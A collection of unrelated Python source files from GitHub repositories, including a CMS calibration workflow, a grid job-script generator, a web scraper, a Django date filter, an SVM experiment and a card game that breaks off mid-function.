connect = self.options.connectStrDBTag,
moduleName = 'customDB%s' % self.options.inputDBRcd
)
def prepare_common_submit(self):
""" Common operations used in most prepare_[workflow_mode]_submit functions"""
if not self.options.run:
raise ValueError("Option run is required for submission!")
if hasattr(self.options, "inputT0DB") and self.options.inputT0DB:
self.add_local_t0_db()
if hasattr(self.options, "inputVDriftDB") and self.options.inputVDriftDB:
self.add_local_vdrift_db()
if hasattr(self.options, "inputDBTag") and self.options.inputDBTag:
self.add_local_custom_db()
if self.options.run_on_RAW:
self.add_raw_option()
if self.options.preselection:
self.add_preselection()
def prepare_common_write(self, do_hadd=True):
""" Common operations used in most prepare_[workflow_mode]_erite functions"""
self.load_options_command("submit")
output_path = os.path.join( self.local_path, "unmerged_results" )
merged_file = os.path.join(self.result_path, self.output_file)
crabtask = self.crabFunctions.CrabTask(crab_config = self.crab_config_filepath,
initUpdate = False)
if not (self.options.skip_stageout or self.files_reveived or self.options.no_exec):
self.get_output_files(crabtask, output_path)
log.info("Received files from storage element")
log.info("Using hadd to merge output files")
if not self.options.no_exec and do_hadd:
returncode = tools.haddLocal(output_path, merged_file)
if returncode != 0:
raise RuntimeError("Failed to merge files with hadd")
return crabtask.crabConfig.Data.outputDatasetTag
def prepare_common_dump(self, db_path):
self.process = tools.loadCmsProcess(self.pset_template)
self.process.calibDB.connect = 'sqlite_file:%s' % db_path
try:
path = self.result_path
except:
path = os.getcwd()
print("path", path)
out_path = os.path.abspath(os.path.join(path,
os.path.splitext(db_path)[0] + ".txt"))
self.process.dumpToFile.outputFileName = out_path
@staticmethod
def addPoolDBESSource( process,
moduleName,
record,
tag,
connect='sqlite_file:',
label='',):
from CondCore.CondDB.CondDB_cfi import CondDB
calibDB = cms.ESSource("PoolDBESSource",
CondDB,
timetype = cms.string('runnumber'),
toGet = cms.VPSet(cms.PSet(
record = cms.string(record),
tag = cms.string(tag),
label = cms.untracked.string(label)
)),
)
calibDB.connect = cms.string( str(connect) )
#if authPath: calibDB.DBParameters.authenticationPath = authPath
if 'oracle:' in connect:
calibDB.DBParameters.authenticationPath = '/afs/cern.ch/cms/DB/conddb'
setattr(process,moduleName,calibDB)
setattr(process,"es_prefer_" + moduleName,cms.ESPrefer('PoolDBESSource',
moduleName)
)
def get_output_files(self, crabtask, output_path):
self.crab.callCrabCommand( ["getoutput",
"--outputpath",
output_path,
crabtask.crabFolder ] )
def runCMSSWtask(self, pset_path=""):
""" Run a cmsRun job locally. The member variable self.pset_path is used
if pset_path argument is not given"""
if self.options.no_exec:
return 0
process = subprocess.Popen( "cmsRun %s" % self.pset_path,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell = True)
stdout = process.communicate()[0]
log.info(stdout)
if process.returncode != 0:
raise RuntimeError("Failed to use cmsRun for pset %s" % self.pset_name)
return process.returncode
@property
def remote_out_path(self):
""" Output path on remote excluding user base path
Returns a dict if crab is used due to crab path setting policy"""
if self.options.command =="submit":
return {
"outLFNDirBase" : os.path.join( "/store",
"user",
self.user,
'DTCalibration/',
self.outpath_command_tag,
self.outpath_workflow_mode_tag),
"outputDatasetTag" : self.tag
}
else:
return os.path.join( 'DTCalibration/',
datasetstr,
'Run' + str(self.options.run),
self.outpath_command_tag,
self.outpath_workflow_mode_tag,
'v' + str(self.options.trial),
)
@property
def outpath_workflow_mode_tag(self):
if not self.options.workflow_mode in self.outpath_workflow_mode_dict:
raise NotImplementedError("%s missing in outpath_workflow_mode_dict" % self.options.workflow_mode)
return self.outpath_workflow_mode_dict[self.options.workflow_mode]
@property
def tag(self):
return 'Run' + str(self.options.run) + '_v' + str(self.options.trial)
@property
def user(self):
if self._user:
return self._user
if hasattr(self.options, "user") and self.options.user:
self._user = self.options.user
else:
self._user = self.crab.checkusername()
return self._user
@property
def local_path(self):
""" Output path on local machine """
if self.options.run and self.options.label:
prefix = "Run%d-%s_v%d" % ( self.options.run,
self.options.label,
self.options.trial)
else:
prefix = ""
if self.outpath_workflow_mode_tag:
path = os.path.join( self.options.working_dir,
prefix,
self.outpath_workflow_mode_tag)
else:
path = os.path.join( self.options.working_dir,
prefix,
self.outpath_command_tag )
return path
@property
def result_path(self):
result_path = os.path.abspath(os.path.join(self.local_path,"results"))
if not os.path.exists(result_path):
os.makedirs(result_path)
return result_path
@property
def pset_template_base_bath(self):
""" Base path to folder containing pset files for cmsRun"""
return os.path.expandvars(os.path.join("$CMSSW_BASE",
"src",
"CalibMuon",
"test",
)
)
@property
def pset_path(self):
""" full path to the pset file """
basepath = os.path.join( self.local_path, "psets")
if not os.path.exists( basepath ):
os.makedirs( basepath )
return os.path.join( basepath, self.pset_name )
def write_pset_file(self):
if not hasattr(self, "process"):
raise NameError("Process is not initalized in workflow object")
if not os.path.exists(self.local_path):
os.makedirs(self.local_path)
with open( self.pset_path,'w') as pfile:
pfile.write(self.process.dumpPython())
def get_config_name(self, command= ""):
""" Create the name for the output json file which will be dumped"""
if not command:
command = self.options.command
return "config_" + command + ".json"
def dump_options(self):
with open(os.path.join(self.local_path, self.get_config_name()),"w") as out_file:
json.dump(vars(self.options), out_file, indent=4)
def load_options(self, config_file_path):
if not os.path.exists(config_file_path):
raise IOError("File %s not found" % config_file_path)
with open(config_file_path, "r") as input_file:
config_json = json.load(input_file)
for key, val in config_json.items():
if not hasattr(self.options, key) or not getattr(self.options, key):
setattr(self.options, key, val)
def load_options_command(self, command ):
"""Load options for previous command in workflow """
if not self.options.config_path:
if not self.options.run:
raise RuntimeError("Option run is required if no config path specified")
if not os.path.exists(self.local_path):
raise IOError("Local path %s does not exist" % self.local_path)
self.options.config_path = os.path.join(self.local_path,
self.get_config_name(command))
self.load_options( self.options.config_path )
| cms-sw/cmssw | CalibMuon/DTCalibration/python/Workflow/DTWorkflow.py | DTWorkflow.py | py | 17,966 | python | en | code | 985 | github-code | 50 |
70082183197 |
class Node:
def __init__(self, d):
self.data = d
self.children = []
class Directory:
def __init__(self, root = None):
self.root = root
def search(self, data):
return self.searchAux(self.root, data)
def searchAux(self, node, data):
if node == None:
return None
if node.data == data:
return node
for child in node.children:
d = self.searchAux(child, data)
if d != None:
return d
return None
def add(self, data, parent = None):
if self.root == None:
self.root = Node(data)
return
p = self.search(parent)
if p == None:
return
p.children.append(Node(data))
def remove(self, data):
parent = self.removeAux(self.root, data)
if parent == None:
return None
return parent[0].children.pop(parent[1])
def removeAux(self, node, data):
if node == None:
return None
for i in range(len(node.children)):
if node.children[i] != None and node.children[i].data == data:
return (node, i)
d = self.removeAux(node.children[i], data)
if d != None:
return d
return None
dir = Directory()
dir.add("home")
dir.add("doc", "home")
dir.add("estrc.txt", "doc")
print("hi")
print(dir.search("estrc.txt").data)
print(dir.remove("estrc.txt").data)
| amchp/ST0245-001 | laboratorios/lab04/codigo/Directorios.py | Directorios.py | py | 1,531 | python | en | code | 0 | github-code | 50 |
26500205426 | #!/usr/bin/python
import optparse, os, sys, ConfigParser, getpass, re, urlparse, time
VERSION = '0.3'
def get_directories(config, dir_type):
"""
Get read or write directories and return formatted list
"""
if config.has_option('Directories', dir_type) and config.get('Directories', dir_type) != '':
directories = config.get('Directories', dir_type).split(',')
directories = map(lambda x: x.strip(), directories)
return directories
else:
return []
def set_chirp_acls(directory, base_dir, acl = 'r'):
"""
Check acls for a directory and set it if needed
"""
real_dir = prefix_base(base_dir, directory)
if not os.path.exists(real_dir) or not os.path.isdir(real_dir):
return False
acl_file = os.path.join(real_dir, '.__acl')
user = getpass.getuser()
if not os.path.exists(acl_file):
acl_perms = "unix:%s rwlda\n" % (user)
open(acl_file, 'w').write(acl_perms)
return True
buf = open(acl_file).read()
match = re.search("unix:%s\s+([a-z]*)\s" % user, buf)
if match is None:
buf += "unix:%s rwlda\n" % (user)
elif 'rwlda' in match.group(1):
return True
else:
buf = re.sub("unix:%s\s+([a-z]*)\s" % user, "unix:%s rwlda" % user, buf)
open(acl_file, 'w').write(buf)
os.system("resetacl %s rwlda" % directory)
return True
def prefix_base(base_dir, path):
if path == '/':
return base_dir
elif path[0] == '/':
return os.path.join(base_dir, path[1:])
return os.path.join(base_dir, path)
def get_chirp_host():
"""
Get chirp host information, starting chirp if necessary
"""
chirp_dir = os.path.expanduser('~/.chirp')
if not os.path.exists(os.path.join(chirp_dir, 'chirp_running')):
os.system('/usr/local/bin/chirp_control start')
time.sleep(3)
port = open(os.path.join(chirp_dir, 'chirp.port')).read().strip()
return "uc3-data.uchicago.edu:%s" % port
def generate_xrootd_args(config):
"""
Generate xrootd specific arguments for parrot_run based on config file
"""
return ""
def set_cvmfs_key(cvmfs_options, key):
"""
Set CVMFS pubkey option in cvmfs_options string, replacing current key if present
"""
key_file = urlparse.urlparse(key)[2].split('/')[-1]
if 'pubkey' not in cvmfs_options:
return cvmfs_options + ",pubkey=" + key_file
options = ""
for opt in cvmfs_options.split(','):
if 'pubkey' in opt:
options += ",pubkey=" + key_file
else:
options += "," + opt
# Return options minus the leading ,
return options[1:]
def parse_cvmfs_options(config):
"""
Generate cvmfs specific arguments for parrot_run based on config file
"""
args = " -r '<default-repositories>"
keys = []
if not config.has_section('CVMFS'):
return ("", [])
repo_num = 1
while True:
repo_opt = "repo%s" % repo_num
if not config.has_option('CVMFS', repo_opt):
# no more repos to add
args += "' "
break
opt_name = "repo%s_key" % repo_num
if config.has_option('CVMFS', opt_name):
key = config.get('CVMFS', opt_name)
if key not in keys:
keys.append(key)
else:
sys.stderr.write("Missing %s in CVMFS section\n" % opt_name)
sys.exit(1)
opt_name = "repo%s_options" % repo_num
if config.has_option('CVMFS', opt_name):
cvmfs_options = config.get('CVMFS', opt_name)
cvmfs_options = set_cvmfs_key(cvmfs_options, keys[-1])
else:
sys.stderr.write("Missing %s in CVMFS section\n" % opt_name)
sys.exit(1)
args += " %s:%s" % (config.get('CVMFS', repo_opt),
cvmfs_options)
repo_num += 1
return (args, keys)
if __name__ == '__main__':
parser = optparse.OptionParser(usage='Usage: %prog [options] arg1 arg2',
version='%prog ' + VERSION)
parser.add_option('-c',
'--config-file',
action='store',
dest='config_file',
default='',
help='Configuration file')
(options, args) = parser.parse_args()
if options.config_file == '':
parser.exit(msg='Must give a config file')
if not os.path.exists(options.config_file) or not os.path.isfile(options.config_file):
sys.stderr.write("Config file %s not found, exting...\n" % options.config_file)
sys.exit(1)
config = ConfigParser.SafeConfigParser()
config.read(options.config_file)
read_directions = []
write_directions = []
ticket = ""
chirp_host = get_chirp_host()
if config.has_section('Directories'):
read_directories = get_directories(config, 'read')
write_directories = get_directories(config, 'write')
ticket_call = "chirp %s ticket_create -output myticket.ticket -bits 1024 -duration 86400 " % chirp_host
base_dir = config.get('Directories', 'chirp_base')
for directory in read_directories:
if not set_chirp_acls(directory, base_dir, 'r'):
sys.stderr.write("Can't set read acl for %s\n" % directory)
sys.exit(1)
ticket_call += " %s rl " % directory
for directory in write_directories:
if not set_chirp_acls(directory, base_dir, 'w'):
sys.stderr.write("Can't set write acl for %s\n" % directory)
sys.exit(1)
ticket_call += " %s rwl " % directory
retcode = os.system(ticket_call)
if os.WEXITSTATUS(retcode) != 0:
sys.stderr.write("Can't create ticket\n")
# sys.exit(1)
ticket = open('myticket.ticket').read().replace('"', r'\"')
os.unlink('myticket.ticket')
parrot_url = 'http://uc3-data.uchicago.edu/parrot.tar.gz'
if config.has_section('Parrot'):
if config.has_option('Parrot', 'location') and config.get('Parrot', 'location') != '':
parrot_url = config.get('Parrot', 'location')
if not config.has_option('Application', 'script'):
sys.stderr.write("Must give an script to run\n")
sys.exit(1)
script_contents = "#!/bin/bash\n"
script_contents += "curr_dir=`cwd`\n"
script_contents += "ticket=\"\n%s\n\"\n" % ticket
script_contents += "temp_directory=`mktemp -d`\n"
script_contents += '''
cd $temp_directory
echo "$ticket" > chirp.ticket'''
script_contents += "\nwget %s\n" % parrot_url
script_contents += "tar xzf %s \n" % parrot_url.split('/')[-1]
if config.has_option('Application', 'location') and config.get('Application', 'location') != '':
script_contents += "wget %s\n" % config.get('Application', 'location')
script_contents += "tar xzf %s\n" % config.get('Application', 'location').split('/')[-1]
arguments = ''
if config.has_option('Application', 'arguments'):
arguments = config.get('Application', 'arguments')
if config.has_option('Application', 'http_proxy') and config.get('Application', 'http_proxy') != '':
script_contents += "export HTTP_PROXY=%s\n" % config.get('Application', 'http_proxy')
(cvmfs_arguments, pubkeys) = parse_cvmfs_options(config)
for pubkey in pubkeys:
script_contents += "wget %s\n" % pubkey
xrootd_arguments = generate_xrootd_args(config)
script_contents += "export CHIRP_MOUNT=/chirp/%s\n" % chirp_host
script_contents += "export PARROT_ALLOW_SWITCHING_CVMFS_REPOSITORIES=1\n"
script_contents += "export PARROT_HELPER=`pwd`/parrot/lib/libparrot_helper.so\n"
script_contents += "./parrot/bin/parrot_run -a ticket -i ./chirp.ticket "
script_contents += "-t $temp_directory/parrot_cache "
script_contents += "%s %s" % (cvmfs_arguments, xrootd_arguments)
script_contents += "%s %s $@\n" % (config.get('Application', 'script'), arguments)
script_contents += "cd $curr_dir\n"
script_contents += "rm -fr $temp_directory"
open('job_script.sh', 'w').write(script_contents)
| DHTC-Tools/UC3 | skeleton_key/scripts/skeleton_key.py | skeleton_key.py | py | 7,715 | python | en | code | 0 | github-code | 50 |
8004784936 | #!/usr/bin/env python3.4
salario = int(input("Salario? "))
imposto = 27
while imposto > 0:
imposto = input("Imposto em % (ex: 27.5)? ")
if not imposto:
imposto = 27
elif imposto == "s":
break
else:
imposto = float(imposto)
print("Valor real: {}".format(salario - (salario * (imposto * 0.01))))
input("Presione ENTER para sair...")
| josejnra/python | python-basics/lacos_funcoes_recursos_etc/while.py | while.py | py | 379 | python | pt | code | 3 | github-code | 50 |
18525434076 | from util import *
import json
from bs4 import BeautifulSoup
import time
def load_city():
f = open('./files/city.json', 'r')
city_data = json.load(f)
return city_data
def get_city_hall(province_code, city_code):
url = 'http://iservice.10010.com/e3/static/life/listHallByPropertyNew?provinceCode={}&cityCode={}&page={}'
page = 1
result = []
keys = ['epProvincename', 'epCityname', 'epName',
'epAddress', 'epLinkTelphone', 'epBusinessTime']
while True:
req = build_request(url.format(province_code, city_code, page))
res_data = req.json()
if 'errorMessage' in res_data:
break
try:
hall_list = res_data['BusinessHallList']
except:
continue
for hall in hall_list:
line = []
for key in keys:
try:
line.append(hall[key])
except:
line.append('')
result.append(line)
print(current_time(), province_code, city_code, page, 'OK')
page += 1
return result
def crawl_hall():
city_data = load_city()
provinces = city_data['provinces']
city_list = city_data['citys']
for index in range(len(provinces)):
province_code = provinces[index][0]
province_name = provinces[index][1]
for city in city_list[index]:
city_code = city[0]
city_name = city[1]
try:
result = get_city_hall(province_code, city_code)
except:
f = open('./files/fail', 'a')
f.write(json.dumps(
provinces[index]+city, ensure_ascii=False)+'\n')
f.close()
continue
f = open('./files/result', 'a')
for hall in result:
f.write(json.dumps(
[province_name, city_name]+hall, ensure_ascii=False)+'\n')
f.close()
print(current_time(), province_name, city_name, 'OK')
crawl_hall()
write_to_excel(load_txt('./files/result'), '联通营业厅数据.xlsx')
| 19js/Nyspider | iservice.10010.com/iservice.py | iservice.py | py | 2,126 | python | en | code | 16 | github-code | 50 |
38021585718 | """
*packageName :
* fileName : 2910_빈도 정렬_S3
* author : jihye94
* date : 2022-07-23
* description :
* ===========================================================
* DATE AUTHOR NOTE
* -----------------------------------------------------------
* 2022-07-23 jihye94 최초 생성
"""
# 메시지의 길이
import collections
n, c = map(int, input().split())
m_arr = list(list(map(int, input().split())))
m_count = collections.Counter(m_arr).most_common()
for value in m_count:
for i in range(value[1]):
print(value[0], end=" ")
| guqtls14/python-algorism-study | 박상준/정렬/2910_백준_빈도 정렬_S3.py | 2910_백준_빈도 정렬_S3.py | py | 629 | python | en | code | 0 | github-code | 50 |
39879369616 | import tkinter as tk
def create_checkbox_dict():
category_dict = {'Культура': '1000000', 'Правосудие': '2000000', 'Происшествия и конфликты': '3000000',
'Экономика и бизнес': '4000000', 'Образование': '5000000', 'Экология': '6000000',
'Медицина': '7000000', 'Светская жизнь': '8000000', 'Досуг, туризм и отдых': '10000000',
'Политика': '11000000', 'Религия': '12000000', 'Наука': '13000000', 'Общество': '14000000',
'Спорт': '15000000', 'Армия и ВПК': '16000000', 'Окружающая среда': '18000000'}
selected_words = []
words = [k for k in category_dict.keys()]
def submit():
for i, kword in enumerate(words):
if checkboxes[i].get() == 1:
selected_words.append(kword)
window.destroy()
h = 30 * (len(words) + 5)
wh = 200 + 140 * (len(words) // 10)
window = tk.Tk()
window.geometry(f"{wh}x{h}")
window.title("Checkbox List")
checkboxes = []
for x, word in enumerate(words):
var = tk.IntVar()
checkbox = tk.Checkbutton(window, text=word.strip(), variable=var, onvalue=1, offvalue=0)
checkbox.grid(row=x, column=1, padx=30, pady=5, sticky='W')
checkboxes.append(var)
submit_button = tk.Button(window, text="Submit", command=submit)
submit_button.grid(row=len(words) + 1, column=1, columnspan=len(words), pady=45)
window.mainloop()
return category_dict[selected_words[0]]
if __name__ == '__main__':
print(create_checkbox_dict())
| pavlinbl4/KSP_selenium_new | KSP_shoot_create/checkbox_output.py | checkbox_output.py | py | 1,724 | python | en | code | 0 | github-code | 50 |
25156254416 | from pathlib import Path
import ai
from ai.examples.alphazero import AlphaZeroMLP
def run(cfg, game, model):
model.init().train().to(cfg.device)
player = ai.game.MctsPlayer(cfg.player, game, model)
task = ai.task.GameTask(game, player, cfg.task.n_matches)
trial = ai.Trial(cfg.outpath, task=task, clean=True)
ai.Trainer(
env=ai.train.RL(cfg.loss.v_weight),
data=ai.data.SelfPlay.from_cfg(cfg, game, player),
).train(
model,
ai.opt.build(cfg.opt, model),
trial.hook(),
steplimit=cfg.train.steplimit,
timelimit=cfg.train.timelimit,
)
return task()
def example_config():
return ai.Config.load(Path(__file__).parent / 'config.yaml')
if __name__ == '__main__':
cfg = example_config()
game = ai.game.TicTacToe()
model = AlphaZeroMLP(game)
run(cfg, game, model)
| calvinpelletier/ai | examples/alphazero/main.py | main.py | py | 872 | python | en | code | 0 | github-code | 50 |
72056400476 | #!/usr/bin/env python
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from rvseg import opts, patient, dataset, models
def save_image(figname, image, mask_true, mask_pred, alpha=0.3):
cmap = plt.cm.gray
plt.figure(figsize=(12, 3.75))
plt.subplot(1, 3, 1)
plt.axis("off")
plt.imshow(image, cmap=cmap)
plt.subplot(1, 3, 2)
plt.axis("off")
plt.imshow(image, cmap=cmap)
plt.imshow(mask_pred, cmap=cmap, alpha=alpha)
plt.subplot(1, 3, 3)
plt.axis("off")
plt.imshow(image, cmap=cmap)
plt.imshow(mask_true, cmap=cmap, alpha=alpha)
plt.savefig(figname, bbox_inches='tight')
plt.close()
def sorensen_dice(y_true, y_pred):
intersection = np.sum(y_true * y_pred)
return 2*intersection / (np.sum(y_true) + np.sum(y_pred))
def jaccard(y_true, y_pred):
intersection = np.sum(y_true & y_pred)
union = np.sum(y_true | y_pred)
return intersection / union
def compute_statistics(model, generator, steps_per_epoch, return_images=False):
dices = []
jaccards = []
predictions = []
for i in range(steps_per_epoch):
images, masks_true = next(generator)
# Normally: masks_pred = model.predict(images)
# But dilated densenet cannot handle large batch size
masks_pred = np.concatenate([model.predict(image[None,:,:,:]) for image in images])
for mask_true, mask_pred in zip(masks_true, masks_pred):
y_true = mask_true[:,:,1].astype('uint8')
y_pred = np.round(mask_pred[:,:,1]).astype('uint8')
dices.append(sorensen_dice(y_true, y_pred))
jaccards.append(jaccard(y_true, y_pred))
if return_images:
for image, mask_true, mask_pred in zip(images, masks_true, masks_pred):
predictions.append((image[:,:,0], mask_true[:,:,1], mask_pred[:,:,1]))
print("Dice: {:.3f} ({:.3f})".format(np.mean(dices), np.std(dices)))
print("Jaccard: {:.3f} ({:.3f})".format(np.mean(jaccards), np.std(jaccards)))
return dices, jaccards, predictions
def main():
# Sort of a hack:
# args.outfile = file basename to store train / val dice scores
# args.checkpoint = turns on saving of images
args = opts.parse_arguments()
print("Loading dataset...")
augmentation_args = {
'rotation_range': args.rotation_range,
'width_shift_range': args.width_shift_range,
'height_shift_range': args.height_shift_range,
'shear_range': args.shear_range,
'zoom_range': args.zoom_range,
'fill_mode' : args.fill_mode,
'alpha': args.alpha,
'sigma': args.sigma,
}
train_generator, train_steps_per_epoch, \
val_generator, val_steps_per_epoch = dataset.create_generators(
args.datadir, args.batch_size,
validation_split=args.validation_split,
mask=args.classes,
shuffle_train_val=args.shuffle_train_val,
shuffle=args.shuffle,
seed=args.seed,
normalize_images=args.normalize,
augment_training=args.augment_training,
augment_validation=args.augment_validation,
augmentation_args=augmentation_args)
# get image dimensions from first batch
images, masks = next(train_generator)
_, height, width, channels = images.shape
_, _, _, classes = masks.shape
print("Building model...")
string_to_model = {
"unet": models.unet,
"dilated-unet": models.dilated_unet,
"dilated-densenet": models.dilated_densenet,
"dilated-densenet2": models.dilated_densenet2,
"dilated-densenet3": models.dilated_densenet3,
}
model = string_to_model[args.model]
m = model(height=height, width=width, channels=channels, classes=classes,
features=args.features, depth=args.depth, padding=args.padding,
temperature=args.temperature, batchnorm=args.batchnorm,
dropout=args.dropout)
m.load_weights(args.load_weights)
print("Training Set:")
train_dice, train_jaccard, train_images = compute_statistics(
m, train_generator, train_steps_per_epoch,
return_images=args.checkpoint)
print()
print("Validation Set:")
val_dice, val_jaccard, val_images = compute_statistics(
m, val_generator, val_steps_per_epoch,
return_images=args.checkpoint)
if args.outfile:
train_data = np.asarray([train_dice, train_jaccard]).T
val_data = np.asarray([val_dice, val_jaccard]).T
np.savetxt(args.outfile + ".train", train_data)
np.savetxt(args.outfile + ".val", val_data)
if args.checkpoint:
print("Saving images...")
for i,dice in enumerate(train_dice):
image, mask_true, mask_pred = train_images[i]
figname = "train-{:03d}-{:.3f}.png".format(i, dice)
save_image(figname, image, mask_true, np.round(mask_pred))
for i,dice in enumerate(val_dice):
image, mask_true, mask_pred = val_images[i]
figname = "val-{:03d}-{:.3f}.png".format(i, dice)
save_image(figname, image, mask_true, np.round(mask_pred))
if __name__ == '__main__':
main()
| chuckyee/cardiac-segmentation | scripts/eval.py | eval.py | py | 5,232 | python | en | code | 274 | github-code | 50 |
33744741148 | import tensorflow as tf
import joblib
import sklearn
# from tensorflow.keras.preprocessing import image
import numpy as np
import matplotlib as plt
import gzip
class_names = ['Lesion', 'Normal']
IMAGE_SHAPE = (224, 224)
def load_and_prep_image(filename, img_shape=224, scale=True):
"""
Reads in an image from filename, turns it into a tensor and reshapes into
(224, 224, 3).
Parameters
----------
filename (str): string filename of target image
img_shape (int): size to resize target image to, default 224
scale (bool): whether to scale pixel values to range(0, 1), default True
"""
# Read in the image
img = tf.io.read_file(filename)
# Decode the read file into a tensor
img = tf.image.decode_image(img)
# Resize the image
img = tf.image.resize(img, size=IMAGE_SHAPE)
# Grayscale
img = tf.image.grayscale_to_rgb(img)
# Rescale the image (getting all values between 0 & 1)
img = img / 255
return img
def pred_and_plot(img, model_name):
img = load_and_prep_image(img, scale=False) # load in target image and turn it into tensor
pred_prob = model_name.predict(
tf.expand_dims(img, axis=0)) # make prediction on image with shape [None, 224, 224, 3]
pred_class = class_names[pred_prob.argmax()] # find the predicted class label
print(f"pred: {pred_class}, prob: {pred_prob.max():.2f}")
# # # Plot the image with appropriate annotations
# plt.figure()
# plt.imshow(img) # imshow() requires float inputs to be normalized
# plt.title(f"pred: {pred_class}, prob: {pred_prob.max():.2f}")
#
# plt.axis(False)
confidence = round(100 * (pred_prob.max()), 2)
return pred_class, confidence
def prep_img(img_path):
IMG_SIZE = (224, 224)
img = tf.io.read_file(img_path)
img = tf.io.decode_image(img)
img = tf.image.resize(img, IMG_SIZE)
return img / 255
def pred_ml_model(img_path, model_name):
img = prep_img(img_path)
nx, ny, nrgb = img.shape
img = np.reshape(img, (1, nx * ny * nrgb))
pred = model_name.predict(img)
confidence = model_name.predict_proba(img)
confidence = confidence.tolist()
print(confidence[0])
confidence = round(100 * (max(confidence[0])), 2)
# return (f'{y_pred_prob[0, ix]:.2%}')
pred_class = class_names[pred[0]]
return pred_class, confidence
# img_path = "test/Late_Blight_106.jpg"
# print(pred_ml_model(img_path, KNN_model))
# print(pred_and_plot(img_path, model))
| prathameshparit/Lesion-Detection | predictions.py | predictions.py | py | 2,560 | python | en | code | 0 | github-code | 50 |
5304829131 | import datetime, time
import parsedatetime.parsedatetime as pdt
import parsedatetime.parsedatetime_consts as pdc
from django.template import Library
from django.template.defaultfilters import stringfilter
from taskmanager.framework.utilities import parsedt
register = Library()
@register.filter(name='parse_date')
@stringfilter
def parse_date(date_string, format="%a %b %d %H:%M:%S %Y"):
"""
Return a datetime corresponding to date_string, parsed according to format.
For example, to re-display a date string in another format::
{{ "01/01/1970"|parse_date:"%m/%d/%Y"|date:"F jS, Y" }}
"""
try:
return datetime.datetime.strptime(date_string, format)
except ValueError:
return None
@register.filter(name='relative_date')
@stringfilter
def relative_date(date_string):
"""
Return a relative date string corresponding to date_string, parsed using parsedatetime.
Returned string will be "today @ hh:mm p" if it's today,
"tomorrow @ hh:mm p" if it's tomorrow,
or "<day of week> @hh:mm p" if it's within a week.
Anything else is "mm/dd/yyyy" (note the lack of a time).
"""
try:
# attempt to parse it in the super-wonky way that django passes
# dates to filters (e.g. not as nice text, sadly)
thedate = datetime.datetime.strptime(date_string.partition('.')[0], "%Y-%m-%d %H:%M:%S")
except ValueError:
# now that we've exhausted our best effort, let's try the next one
thedate = parsedt(date_string)
try:
# actually gets the time it was this morning
rightnow = datetime.datetime.combine(datetime.datetime.now(), datetime.time.min)
# and compute the difference so we can give relative dates
diff = thedate - rightnow
except:
# any exception here should return nothing
return None
if diff.days == 0: # Today
return 'today @' + thedate.strftime("%-I:%M %p (%m/%d/%Y)") ## at 05:45 PM
elif diff.days == 1: # Tomorrow
return 'tomorrow @' + thedate.strftime("%-I:%M %p (%m/%d/%Y)") ## at 05:45 PM Tomorrow
elif diff.days < 7: # one week from now
return thedate.strftime("%A @%-I:%M %p (%m/%d/%Y)") ## at 05:45 PM Tuesday
else:
return 'on ' + thedate.strftime("%m/%d/%Y") ## on 10/03/1980
| falquaddoomi/cens_dev | taskmanager/templatetags/parse_date.py | parse_date.py | py | 2,322 | python | en | code | 0 | github-code | 50 |
70069960155 | from sklearn import svm
import numpy as np
path = "currentStateFinal.txt"
f = open('data.txt','w')
dataFile = open(path, 'r')
n = 0
# Magic numbers
occupiedSet = [[22, 19, 37], [22, 39, 36], [24, 5, 15], [25, 19, 21], [25, 24, 14]]
emptySet = [[22, 38, 6], [23, 41, 58], [25, 18, 45], [25, 20, 19], [25, 26, 5]]
svmData = []
y = []
queue = []
queueSize = 15
t = 10; #tolerance
def isOccupied(time):
occupiedSet = [[22, 19, 37-t], [22, 39, 36-t], [24, 5, 15-t], [25, 19, 21-t], [25, 24, 14-t]]
emptySet = [[22, 38, 6+t], [23, 41, 58+t], [25, 18, 45+t], [25, 20, 19+t], [25, 26, 5+t]]
for i in range(5):
if (time > occupiedSet[i] and time < emptySet[i]):
return 1
return 0
for line in dataFile:
# Date line, ignore " " before line
if (n % 2 == 0):
result = []
currLine = line[1:]
datas = currLine.split(" ")
if (len(datas) < 5):
break
time = datas[3].split(":")
hour = time[0]
minute = time[1]
second = time[2]
if (int(hour) < 20):
hour = int(hour) + 24
if (isOccupied([int(hour), int(minute), int(second)])):
#Occupied
result = 0
else:
#Empty
result = 50
# Sensor line, ignore PIR sensor version
else:
currLine = line[1:]
distance = currLine.split(" ")[1]
y.append(result)
svmData.append([int(distance)])
if (len(queue) == queueSize):
queue.pop(0)
queue.append(int(distance[:-1]))
f.write(str(round(sum(queue) / len(queue))) + "," + str(result) + "\n")
n += 1
f.close()
dataFile.close()
#print(svmData)
#print(len(svmData))
#print(y)
#clf = svm.SVC(kernel='poly', degree=2, C=1.0)
clf = svm.SVC()
clf.fit(svmData, y)
for i in range(200, 500):
print(clf.predict([i]))
| jackalsin/Python | AIS_Project2016/MachineLearning.py | MachineLearning.py | py | 1,879 | python | en | code | 1 | github-code | 50 |
70249628314 | import random
import time
from random import choice
import os
def carta1():
carta = {
"tipo": "",
"palo": "",
"valor": "",
}
tipos = [1, 2, 3, 4, 5, 6, 7, "Sota", "Caballo", "Rey"]
palos = ["Oro", "Basto", "Copa", "Espadas"]
lista_cartas = []
for palo in palos:
for tipo in tipos:
carta = carta.copy()
carta["tipo"] = tipo
carta["palo"] = palo
if carta["tipo"] == "Sota":
carta["valor"] = 0.5
elif carta["tipo"] == "Caballo":
carta["valor"] = 0.5
elif carta["tipo"] == "Rey":
carta["valor"] = 0.5
else:
carta["valor"] = carta["tipo"]
lista_cartas.append(carta)
return lista_cartas
def barajar():
baraja = carta1()
cartas_barajadas = []
for carta in baraja:
i = random.randint(0, len(cartas_barajadas))
cartas_barajadas.insert(i, carta)
return cartas_barajadas
def sieteymedio(num_jugadores):
limite = 7.5
lista_puntuaje = []
lista = []
for jug in range(num_jugadores):
carta_aleatoria = choice(barajar())
suma_total = carta_aleatoria["valor"]
print("Te ha tocado la carta " + str(carta_aleatoria["tipo"]) + " de " + str(carta_aleatoria["palo"]))
print("Tienes " + str(carta_aleatoria["valor"]) + " puntos")
respuesta = input("¿Quieres otra carta?: ")
while respuesta == "SI".lower():
carta_aleatoria = choice(barajar())
print("\nTe ha tocado la carta " + str(carta_aleatoria["tipo"]) + " de " + str(carta_aleatoria["palo"]))
barajar().remove(carta_aleatoria)
suma_total += carta_aleatoria["valor"]
if suma_total == 1:
print("Tienes " + str(suma_total) + " punto")
else:
print("Tienes " + str(suma_total) + " puntos")
if suma_total == 7.5:
print("Has terminado")
lista_puntuaje.append(suma_total)
suma_total = 0
lista.append(suma_total)
time.sleep(1.2)
os.system('cls')
break
else:
